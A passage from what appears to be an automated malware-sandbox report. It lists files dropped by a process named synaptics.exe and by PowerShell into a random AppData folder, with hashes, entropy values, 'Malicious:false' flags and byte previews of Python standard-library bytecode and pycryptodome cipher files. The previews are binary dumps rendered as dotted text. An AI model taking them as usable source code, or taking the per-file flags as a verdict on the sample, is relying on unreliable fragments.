                                                                                                                                                                                                            Preview:o.......Z.,d.@.......................@...s6...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.yA......d.Z.Y.n.w.e...d...Z.e...d...Z.e...d...Z.d.d.d.d.d.d.d.d...Z.e.d...D.].Z.e...e.e...d...e.......q_e.d...Z.d.d...Z.e.pxe.Z.d.d...Z.e.p.e.Z.G.d.d...d.e...Z.e.e.e.e.e.e.e.e e!e.j"f.d.d...Z#d.S.).z.Implementation of JSONEncoder......N)...encode_basestring_ascii)...encode_basestring)...make_encoderz.[\x00-\x1f\\"\b\f\n\r\t]z.([\\"]|[^\ -~])s....[.-.]z.\\z.\"z.\bz.\fz.\nz.\rz.\t)...\.."................ .....\u{0:04x}..infc....................C........d.d...}.d.t...|.|.....d...S.).z5Return a JSON representation of a Python string.. c....................S...s....t.|...d.....S.).Nr....)...ESCAPE_DCT..group)...match..r.....;C:\Users\user\AppData\Local\xFSOj9El1Q\lib\json\encoder.py..replace(...s......z%py_encode_basestring.<locals>.replacer....)...ESCAPE..sub....sr....r....r....r......py_encode_basestring$...s........r....c.....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1940
                                                                                                                                                                                                            Entropy (8bit):5.60836953056975
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lvwhn/cfelN3xf9oI0rv3y1R0vSFkU9VTdOIC54vD:S0MFLoPwHTd9CeD
                                                                                                                                                                                                            MD5:A3E275B4629D233955005933C17E23CD
                                                                                                                                                                                                            SHA1:36239E1CDE7712D404EF5838D8A0DD6332F1E96B
                                                                                                                                                                                                            SHA-256:CABDC31DB8093036987920955142AA2542FCAE2FF5712A0F822D6BBF0FF1C229
                                                                                                                                                                                                            SHA-512:4D09A77198E15D415BFEF36E7D63658942EAD14004CE1BD0B2DBDFCCA4C85C6BDBCB1183AD53E7EC55D96BB5633EA2469D4AC84F460F0558B81D24783954E5A0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sh...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.g.Z.e...d.e.j.e.j.B.e.j.B...Z.d.d...Z.e.p1e.Z.d.S.).z.JSON token scanner......N)...make_scannerr....z)(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?c........................sv...|.j...|.j...|.j...t.j...|.j...|.j...|.j...|.j...|.j...|.j...|.j...........................f.d.d.........f.d.d...}.|.S.).Nc........................s....z.|.|...}.W.n...t.y.......t.|...d...w.|.d.k.r...|.|.d.......S.|.d.k.r0..|.|.d...f.............S.|.d.k.r=..|.|.d...f.....S.|.d.k.rQ|.|.|.d.......d.k.rQd.|.d...f.S.|.d.k.re|.|.|.d.......d.k.red.|.d...f.S.|.d.k.ry|.|.|.d.......d.k.ryd.|.d...f.S...|.|...}.|.d.u.r.|.....\.}.}.}.|.s.|.r...|.|.p.d...|.p.d.....}.n...|...}.|.|.....f.S.|.d.k.r.|.|.|.d.......d.k.r...d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.t.|.....).N..".......{..[..n.....Z.null..t..trueT..f.....Z.falseF....N.......NaN..I.......Infinity..-.....z.-Infinit
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):66915
                                                                                                                                                                                                            Entropy (8bit):5.227096142753104
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:QdNU29zPGlE+L/8P4CcmsaS+rtz8lEp6wQh++5+VCKlv+g7tXcEOokQ02BbB:Qdy07e/8P4pmRSe58a6+rIZWLVxB
                                                                                                                                                                                                            MD5:C6FF67AB6946A2200F41773CCB461BAA
                                                                                                                                                                                                            SHA1:2932F4753F8F327207E30328699C0ABFC6AABE73
                                                                                                                                                                                                            SHA-256:FA6EB2206B95A83C83113E71192A004A7113A388BEBB32E748EB85ADA1B5278C
                                                                                                                                                                                                            SHA-512:5CF27DE982C54ACF034505E531BB7AC5CC73486A5F966E15B9289D30CEDD6D86A88234145BA20FE3D3C9725CC66B52B5D5DA101AC713CDB87BBC84740E798707
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d=B.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.d.Z.e.....Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.Z.d.Z.e.Z.d.Z.d.Z d.Z!e.d.e.d.e.d.e.d.e d.e!d.i.Z"e.e.e.e.e.e.e e!d...Z#d.d...Z$d.d...Z%e&e.d...r.d.d...Z'n.d.d...Z'e.j(.)e%j*j+..Z,d d!..Z-e.....Z/d"d#..Z0d$d%..Z1e&e.d&..s.d'd(..Z2n.e..3..Z4d)d(..Z2d*d+..Z5e.j6e0e5e1d,....G.d-d...d.e7..Z8e8a9d/d0..Z:d1d2..Z;d3d4..Z<e...Z=[.G.d5d6..d6e7..Z>G.d7d8..d8e>..Z?G.d9d:..d:e>..Z@d;ZAe>eAf.e?d<f.e@d=f.d>..ZBG.d?d@..d@e7..Z.e...ZCG.dAdB..dBe7..ZDG.dCdD..dDe7..ZEG.dEdF..dFe7..ZFe..G..ZHg.ZIdGdH..ZJdIdJ..ZKG.dKdL..dLeF..ZLG.dMdN..dNeL..ZMG.dOdP..dPeM..ZNG.dQdR..dReM..ZOeOe...ZPePZQG.dSdT..dTe7..ZRdUdV..ZSdWdX..ZTG.dYdZ..dZe7..ZUG.d[d\..d\eF..ZVG.d]d^..d^eV..ZWeVaXG.d_d`..d`e7..ZYeWe...ZZeZeV_ZeUeVjZ..eV_[dadb..Z\d.dcdd..Z]dedf..Z^dgdh..Z_didj..Z`d.dk..dldm..Zadndo..Zbdpdq..Zcdrds..Zddtdu..Zedvdw..Zfe.f.dxdy..ZgeIf.dzd{..Zhd.d.liZiei.jeh..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):693
                                                                                                                                                                                                            Entropy (8bit):5.124963029154462
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CClW2ZWZaX03+H/xoVfAf+fs3NZDCFOPWiO7nmV8om2RDwPpp:lBAd3+oVfFf2NZDyuOiVzJwPpp
                                                                                                                                                                                                            MD5:B70A0AF45BC62DD1CCCB90C5AE152B8C
                                                                                                                                                                                                            SHA1:44BC37894213275D2681C413ABC6C3858318C185
                                                                                                                                                                                                            SHA-256:E2FE0D37D808F6DD5C793C2D249F1DE459DEE99B31B92D6514655689E1E8A792
                                                                                                                                                                                                            SHA-512:4B1BA759394F287B9E3D1A1837B7F68F5F54A2FAF89FB112817C00BF6F45B004EED3D8DBFF2BDF35ABECAD9C57F3797988FA911E837FB4ADA9456F074BFD1D9D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sh...d.d.l.Z.d.d.l.m.Z...d.d...e.e.j...D...Z.e.....d.d...e.D.......d.Z.d.Z.d.e.j.v.r2e.j.d...e.j.d.<.d.S.d.S.)......N.....)...contextc....................C...s....g.|.].}.|...d...s.|...q.S.)..._)...startswith)....0..x..r.....GC:\Users\user\AppData\Local\xFSOj9El1Q\lib\multiprocessing\__init__.py..<listcomp>....s......r....c....................c...s .....|.].}.|.t.t.j.|...f.V...q.d.S.).N)...getattrr......_default_context).r......namer....r....r......<genexpr>....s........r................__main__Z.__mp_main__)...sys..r......dirr......__all__..globals..updateZ.SUBDEBUGZ.SUBWARNING..modulesr....r....r....r......<module>....s......................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12878
                                                                                                                                                                                                            Entropy (8bit):4.849285463432556
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:YkUmlRfTW+lRLdDM6NLUIsLgZxeg0SMfkX0:YCLRLdDM6tIs+fSMfkX0
                                                                                                                                                                                                            MD5:964760BC2C006A272AFB763601E8A754
                                                                                                                                                                                                            SHA1:167C27F680DE10C9F7BCED10565CF31B8E77806A
                                                                                                                                                                                                            SHA-256:156BFE43498D4F3B6EB7CB058A30760CB1F8ACDA8600BAEA27EEAD366C8EA25A
                                                                                                                                                                                                            SHA-512:CD370EBE897C204CFD432868CB068FAE6F2E97033C81DCD3606977AEEEA6F4453185D92194A62CA2F7DF6ED776643A7E32EC60B059662126D5F99A09C86EA4A7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.e.j.d.k.r.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.e...e...e...d!..Z.e.j.d"k.r.e.e.d#....Z.n#e.e.d$....Z.n.G.d%d...d.e.j...Z.G.d&d...d.e...Z.d#e...i.Z.e.e.d#....Z.d'd(..Z.e.....Z.d)d*..Z.d+d,..Z.d-d...Z.d.S.)/.....N.....)...process)...reduction..c....................@........e.Z.d.Z.d.S.)...ProcessErrorN....__name__..__module__..__qualname__r....r....r.....FC:\Users\user\AppData\Local\xFSOj9El1Q\lib\multiprocessing\context.pyr.................r....c....................@...r....)...BufferTooShortNr....r....r....r....r....r........r....r....c....................@...r....)...TimeoutErrorNr....r....r....r....r....r........r....r....c....................@...r....)...AuthenticationErrorNr....r....r....r....r....r........r.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12878
                                                                                                                                                                                                            Entropy (8bit):4.849285463432556
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:YkUmlRfTW+lRLdDM6NLUIsLgZxeg0SMfkX0:YCLRLdDM6tIs+fSMfkX0
                                                                                                                                                                                                            MD5:964760BC2C006A272AFB763601E8A754
                                                                                                                                                                                                            SHA1:167C27F680DE10C9F7BCED10565CF31B8E77806A
                                                                                                                                                                                                            SHA-256:156BFE43498D4F3B6EB7CB058A30760CB1F8ACDA8600BAEA27EEAD366C8EA25A
                                                                                                                                                                                                            SHA-512:CD370EBE897C204CFD432868CB068FAE6F2E97033C81DCD3606977AEEEA6F4453185D92194A62CA2F7DF6ED776643A7E32EC60B059662126D5F99A09C86EA4A7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.e.j.d.k.r.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.e...e...e...d!..Z.e.j.d"k.r.e.e.d#....Z.n#e.e.d$....Z.n.G.d%d...d.e.j...Z.G.d&d...d.e...Z.d#e...i.Z.e.e.d#....Z.d'd(..Z.e.....Z.d)d*..Z.d+d,..Z.d-d...Z.d.S.)/.....N.....)...process)...reduction..c....................@........e.Z.d.Z.d.S.)...ProcessErrorN....__name__..__module__..__qualname__r....r....r.....FC:\Users\user\AppData\Local\xFSOj9El1Q\lib\multiprocessing\context.pyr.................r....c....................@...r....)...BufferTooShortNr....r....r....r....r....r........r....r....c....................@...r....)...TimeoutErrorNr....r....r....r....r....r........r....r....c....................@...r....)...AuthenticationErrorNr....r....r....r....r....r........r.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11286
                                                                                                                                                                                                            Entropy (8bit):5.117215548596219
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:eiyKSdzLd8K2X0M65TqXEzvng+JOFZvDzkmq9wNdpB0:eiyKS1CkM6N0Ezvng+UFZrztq9a2
                                                                                                                                                                                                            MD5:1D1634033DCB78B85B78E48B2182ACCC
                                                                                                                                                                                                            SHA1:1FB2651EBC7C19E1838CADDC3C00B7D2FB13C293
                                                                                                                                                                                                            SHA-256:4CD227AD95B95AE9FF27BF89FF2902BAD23C21A6D5DBBEDF50576B9C818B37D3
                                                                                                                                                                                                            SHA-512:0397240B564FCA74EC2971ABFC9988B598E14B8FC017AA5DF5A02E3A8E1FAA57CB423583F168ACB717CF72EEB30D6DA65D780B96F8A7F919521965E7B16FD853
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.0.......................@...s2...g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...z.e.j...e.......Z.W.n...e.y3......d.Z.Y.n.w.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.a.e...a.e...d...a.e...a.[.i.Z.e.e.j.. ....D.].\.Z!Z"e!d.d.....d.k.r.d.e!v.r.d.e!....e.e"..<.q{e...Z#d.S.).)...BaseProcess..current_process..active_children..parent_process.....N)...WeakSetc....................C........t.S.).z@. Return process object representing the current process. )..._current_process..r....r.....FC:\Users\user\AppData\Local\xFSOj9El1Q\lib\multiprocessing\process.pyr....%..........r....c....................C...s....t.....t.t...S.).zN. Return list of process objects corresponding to live child processes. )..._cleanup..list.._childrenr....r....r....r....r....+...s........r....c....................C...r....).z?. Return process object representing the parent process. )..._parent_processr....r....r....r....r..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8321
                                                                                                                                                                                                            Entropy (8bit):5.185474432172793
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:PFKWKGBxGtTtQEGI1l/1ZmvtX9lZFftyZgq:PpatT0I1ltZmvxjXftyZgq
                                                                                                                                                                                                            MD5:07D1FCA0799AD17412AA860188021EA2
                                                                                                                                                                                                            SHA1:37B056BBB64F79FEC515F4EBF60E9BDFEDDD8E24
                                                                                                                                                                                                            SHA-256:50B55725CF13F127E4CCABE258D07CB47B9BED014C8A8867400E145467BB6399
                                                                                                                                                                                                            SHA-512:FB21647AB3A8C3390633AD9CAF55DB4D9BDA5471C0F2865B683B4E32B29FF61962A9722F5980EF998D6CBA61261840469F34C5EAA0FFA4380A99DD7BED240692
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dA&.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.e.j.d.k.p@e.e.d...o@e.e.d...o@e.e.j.d...Z.G.d.d...d.e.j...Z.e.j.Z.d8d.d...Z.e.j.d.k.r~e.g.d...7.Z.d.d.l.Z.d9d.d...d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.n#e.g.d...7.Z.d.d.l.Z.e.j.d.k.Z.d.d...Z.d.d ..Z.d!d...Z.d"d...Z.d#d$..Z.d%d&..Z.G.d'd(..d(..Z e.e!e ..j"..e.....d)d*..Z#e.e!e$j%..e#....e.e!e&j'..e#....d+d,..Z(d-d...Z)e.e.j*e(....e.j.d.k.r.d/d0..Z+d1d2..Z,e.e.j.e+....n.d3d0..Z+d4d2..Z,e.e.j.e+....G.d5d6..d6e.d7..Z-d.S.):.....)...ABCMetaN.....)...context)...send_handle..recv_handle..ForkingPickler..register..dump..win32Z.CMSG_LEN..SCM_RIGHTS..sendmsgc........................sJ...e.Z.d.Z.d.Z.i.Z.e.j.Z...f.d.d...Z.e.d.d.....Z.e.d.d.d.....Z.e.j.Z.....Z.S.).r....z)Pickler subclass used by multiprocessing.c........................s*...t...j.|.....|.j.....|._.|.j...|.j.....d.S...N)...super..__init__.._copyreg_dispatch_table..copy..dispatch_table..upda
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9152
                                                                                                                                                                                                            Entropy (8bit):4.914458127073994
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:dmQHvdBT4geSDztF9+hMkRI4H1Fit/zyc/Ki/yRAL:sedBTRt4Ot/L/K7AL
                                                                                                                                                                                                            MD5:8262A551167B54C56C60F05240A69080
                                                                                                                                                                                                            SHA1:05FF4ED6FAE8771AEE11D3E18D0AEB9B360764E7
                                                                                                                                                                                                            SHA-256:C9C16133388BA9C97A5A9541B671A767EC316FF32C74B7FA261BE4C2686B4119
                                                                                                                                                                                                            SHA-512:E82A1D9BFDA7EF6AFE84FE6DC126091B65ABA252C95B338599149064B3AE1F272DBA4F68A2DB593A61469396FC5D802A21B4C82EA48651720F47CEAF90453843
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Cipher/AES.py : AES..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =====================================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3775
                                                                                                                                                                                                            Entropy (8bit):4.806063133542859
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:5FYPjdtB5JjZL6mKokLSL0jcj9yYFtpZuObl9gbiYbwJbzk:5PZoUW0jcj9yYFtpZuObfgbiYbwJbzk
                                                                                                                                                                                                            MD5:B945169B742389524DF72625C079BB77
                                                                                                                                                                                                            SHA1:C9E77F8537E3B9888CBCF45E26774192ACB0C39A
                                                                                                                                                                                                            SHA-256:A0C8ED071D9E4B833FFD9BCA4658711806A4DA9D95492333EF39B61EF84FD1F6
                                                                                                                                                                                                            SHA-512:E1FAA4C936410781682007CE1C65C03D2CE947DCFB1A50D75184B075F5BEBC070A87FED4511086BBBF073EA831331BA8DFD3B87B520D5137AB80FB91D3AD4DA7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Dict, Optional, Tuple, Union, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_ccm import CcmMode..from Crypto.Cipher._mode_eax import EaxMode..from Crypto.Cipher._mode_gcm import GcmMode..from Crypto.Cipher._mode_siv import SivMode..from Crypto.Cipher._mode_ocb import OcbMode....MODE_ECB: Literal[1]..MODE_CBC: Literal[2]..MODE_CFB: Literal[3]..MODE_OFB: Literal[5]..MODE_CTR: Literal[6]..MODE_OPENPGP: Literal[7]..MODE_CCM: Literal[8]..MODE_EAX: Literal[9]..MODE_SIV: Literal[10]..MODE_GCM: Literal[11]..MODE_OCB: Literal[12]....# MODE_ECB..@overload..def new(key: Buffer,.. mode: Literal[1],.. use_aesni : bool = ...) ->
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7185
                                                                                                                                                                                                            Entropy (8bit):4.784592068528299
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:dHQHv8gflA2jSkmRFmynD/t4AKdRYotKI:te8g9A82jnD/t4hjYotKI
                                                                                                                                                                                                            MD5:274E46A9AE6D3E092B48A7D1AB3F0D6D
                                                                                                                                                                                                            SHA1:FB5A62548FB3876FF73319D3C92565B64CEA3E69
                                                                                                                                                                                                            SHA-256:CF808C3951F83D9E86799E02A564661D6C372216656DC5D40FD9E19B21D84A53
                                                                                                                                                                                                            SHA-512:D9850D167368AE4B901512D5B3111EF6858E643FCD4DCA7EE2A263ADBB621D3D9729D124A9A9570EB250D63034734663B16770ACC5B2D4F1CEEFB3E47EACD8B3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Cipher/ARC2.py : ARC2.py..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1020
                                                                                                                                                                                                            Entropy (8bit):4.950943296452636
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+PvpB+yE2x/NEo0EDNqDNMN3zb1DoeRHYO:K+1+O+O+s+8+s+w+Hx9GIJqJejbFoeRZ
                                                                                                                                                                                                            MD5:E00CF491B8FC5ACAF9CEF612321636A0
                                                                                                                                                                                                            SHA1:AB112C6E5D09F9A330047422454765FC4D691F1F
                                                                                                                                                                                                            SHA-256:605DD941F8ED380F3CF8906B995FCF9CFD8D801668E85B8FC889D72EC00087CD
                                                                                                                                                                                                            SHA-512:5FE5E3E20E1911E73FAB3886072A47F6C0E554C9F0D1A3604FDB8577747143C220457FB1105D565589E59A6202EE893F2F5C82A63267AEFA061BB129BA3A23C3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....ARC2Mode = int....MODE_ECB: ARC2Mode..MODE_CBC: ARC2Mode..MODE_CFB: ARC2Mode..MODE_OFB: ARC2Mode..MODE_CTR: ARC2Mode..MODE_OPENPGP: ARC2Mode..MODE_EAX: ARC2Mode....def new(key: Buffer,.. mode: ARC2Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_s
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5252
                                                                                                                                                                                                            Entropy (8bit):4.721675811667996
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:dHIB0jcQHMsvI/S3oCFG+PdiIPskHzgirvO/ZEgR2lYvHipJjHeLEyEMWnP7a7jv:doFQHvo7dIUoeGgR2uvi/jqEyExPNOuG
                                                                                                                                                                                                            MD5:0EF036A0343812F8BD2CD7CC80B2BA95
                                                                                                                                                                                                            SHA1:B443E26A222338477A44BF29FD5ACA2942271B86
                                                                                                                                                                                                            SHA-256:717B865CC7A4417AEAF0EFA70B60EF7C42CBFDAE4433BD704EAB9DDF75C50486
                                                                                                                                                                                                            SHA-512:AA5E7F0BF9C5199B5E76441DECB0CC5A0899EDBE7517F6A6646D14205E727FCF35EA935A921EC90502B7783D28CDCC5BF648F8FA2A06FFDEFE302171332C6D3F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Cipher/ARC4.py : ARC4..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):438
                                                                                                                                                                                                            Entropy (8bit):4.892911336139007
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYBdHgMJjWrMRyDWeXRyc1APyMFq6R5wnZ0R5AomWL7Ry/O:1REUAIWrQFeBFAfnRe+RGorVYO
                                                                                                                                                                                                            MD5:F00CD9D3130AA368D5F1F10B93E0A612
                                                                                                                                                                                                            SHA1:E9C27B3918320183E7366BD1D1294B48EAC93378
                                                                                                                                                                                                            SHA-256:28855BC2FF6531EFD40C42075EB5E506AD8A5F8D98B8041FB218725C7C484054
